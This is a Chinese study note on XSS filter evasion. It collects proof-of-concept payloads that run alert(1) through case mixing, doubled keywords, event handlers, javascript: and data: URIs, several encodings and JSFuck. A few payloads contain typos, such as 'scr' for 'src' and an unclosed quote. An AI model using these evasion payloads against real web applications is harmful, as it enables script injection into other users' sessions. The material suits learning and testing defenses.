2019-11-22:xss绕过笔记
xss变形
大小写混合,sCRipt
重复写,scrscriptipt
通过某些标签来src属性,构造pyload,src找不到数据源的时候内部会出错,此时使用onerror触发,或iframe标签,<iframe scr="javascript:alert(1)">,svg标签,<svg/onload=alert(a)>
通过一些属性,background,data,code,posters等属性
通过某些时间,onclick,onload,onerror,onstart等
有圆括号限制的,<a onmouseover="javascript:window.onerror=alert;throw 1>123</a>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
xss运行条件
1,独立的script标签
2,某些标签内部
js伪协议
伪协议不同于因特网上所真实存在的如http://,https://,ftp://,而是为关联应用程序而使用的.如:tencent://(关联QQ),data:(用base64编码来在浏览器端输出二进制文件),还有就是javascript:
这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行。如果javascript:URL中的javascript代码含有多个语句,必须使用分号将这些语句分隔开。
data伪协议
伪协议不同于因特网上所真实存在的如http://,https://,ftp://,而是为关联应用程序而使用的.如:tencent://(关联QQ),data:(用base64编码来在浏览器端输出二进制文件),还有就是javascript:
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
在标签内部如何执行XSS语句
闭合属性,闭合标签,无法闭合可能进行了htmlencode编码(htmlspecialchars函数)
利用事件
特殊属性src/href/action
javascript伪协议
data伪协议
html实体编码
注意在用的时候需要注意输入到浏览器,&在url中,是参数分隔符,#在url中,#会忽略后面的内容,所以需要把&和# url编码。
<img src=x onerror=alert(1)> 就会变成最终payload:
<img src=x onerror=alert%26%2340%3B%26%2349%3B%26%2341%3B>
String.fromCharCode函数通过ascii码来获取字符串
eval函数计算某个字符串,并执行其中的的 JavaScript 代码。
<script>alert(1)</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
十六进制编码
<img src=x onerror=eval("\x61\x6C\x65\x72\x74\x28\x31\x29")>
<script>eval("\x61\x6C\x65\x72\x74\x28\x31\x29")</script>
Unicode 编码
Unicode 是为了解决传统的字符编码方案的局限而产生的,它为每种语言中的每个字符设定了统一并且唯一的二进制编码,以满足跨语言、跨平台进行文本转换、处理的要求。1990年开始研发,1994年正式公布。
js unicode是以十六进制代码外加开头\u表示的字符串。即\unnnn
'\u54e6' -> "哦"
<img src=x onerror=eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029")>
url编码
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3e
jsfuck
<img src=x onerror=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()>
<script>jsfuck</script>